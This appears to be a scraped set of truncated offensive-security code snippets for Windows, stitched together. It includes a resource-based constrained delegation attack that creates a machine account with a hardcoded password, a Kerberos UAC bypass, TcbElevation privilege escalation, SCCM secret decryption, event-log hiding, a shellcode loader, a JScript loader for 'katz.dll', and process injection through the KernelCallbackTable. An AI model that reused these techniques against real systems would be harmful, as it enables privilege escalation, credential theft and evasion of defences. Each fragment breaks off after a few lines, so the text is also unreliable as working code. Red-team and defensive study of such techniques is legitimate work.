| # original code from Connor Peoples / https://twitter.com/NoUselessTech | |
| # modified for cme @mpgn_x64 POC | |
| $Token = "skypetoken=YOUR_TOKEN" | |
| $Header = @{ | |
| authentication = $Token | |
| "content-type" = "application/json" | |
| "x-ms-client-request-id" = [guid]::NewGuid().ToString() |
| # Add Machine account | |
| New-MachineAccount -MachineAccount STRANGE -Password $(ConvertTo-SecureString 'Strange@123' -AsPlainText -Force) | |
| # Add STRANGE$ in msDS-AllowedToActOnBehalfOfOtherIdentity attribute of QUARK$ | |
| $S4UIdentity = "COSMOS\STRANGE$" | |
| $IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $S4UIdentity).Translate([System.Security.Principal.SecurityIdentifier])).Value | |
| $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))" | |
| $SDBytes = New-Object byte[] ($SD.BinaryLength) | |
| $SD.GetBinaryForm($SDBytes, 0) |
| // This changes how the process authenticates to the local SCM so that it uses Kerberos, | |
| // which is the basis of the UAC bypass through Kerberos tickets. | |
| // See https://www.tiraniddo.dev/2022/03/bypassing-uac-in-most-complex-way.html | |
| #define SECURITY_WIN32 | |
| #include <windows.h> | |
| #include <sspi.h> | |
| #include <security.h> | |
| #include <stdio.h> | |
| #include <string> |
| // TcbElevation - Authors: @splinter_code and @decoder_it | |
| #define SECURITY_WIN32 | |
| #include <windows.h> | |
| #include <sspi.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "Secur32.lib") | |
| void EnableTcbPrivilege(BOOL enforceCheck); |
| // Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;) | |
| // Must be run on the SCCM server that holds the "Microsoft Systems Management Server" cryptographic service provider (CSP), otherwise it will not work. | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| namespace SCCMDecryptPOC | |
| { | |
| internal class Program |
| using System; | |
| using System.Collections.Generic; | |
| using System.Diagnostics; | |
| using System.Linq; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| namespace HiddenEventLogs | |
| { |
| #include "Windows.h" | |
| #include "stdio.h" | |
| #include "strsafe.h" | |
| #include "winternl.h" | |
| #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004 | |
| typedef struct _FILE_PROCESS_IDS_USING_FILE_INFORMATION | |
| { | |
| ULONG NumberOfProcessIdsInList; |
| //original runner by @Arno0x: https://github.com/Arno0x/CSharpScripts/blob/master/shellcodeLauncher.cs | |
| using System; | |
| using System.Runtime.InteropServices; | |
| using System.Reflection; | |
| using System.Reflection.Emit; | |
| namespace ShellcodeLoader | |
| { | |
| class Program |
| new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools'; | |
| try { | |
| var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="AllTheThings" version="0.0.0.0"/> <file name="katz.dll"> <comClass description="AllTheThings Class" clsid="{89565276-A714-4a43-912E-978BFEEDACDC}" threadingModel="Both" progid="AllTheThings"/> </file> </assembly>'; | |
| var ax = new ActiveXObject("Microsoft.Windows.ActCtx"); | |
| ax.ManifestText = manifest; | |
| // Create Base64 Object, supports encode, decode | |
| var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.characters.charAt(s)+Base64.characters. |
| using System; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| namespace SendMessageKernelCallback | |
| { | |
| /*References: | |
| * 1. https://t0rchwo0d.github.io/windows/Windows-Process-Injection-Technique-KernelCallbackTable/ | |
| * 2. https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/ | |
| */ |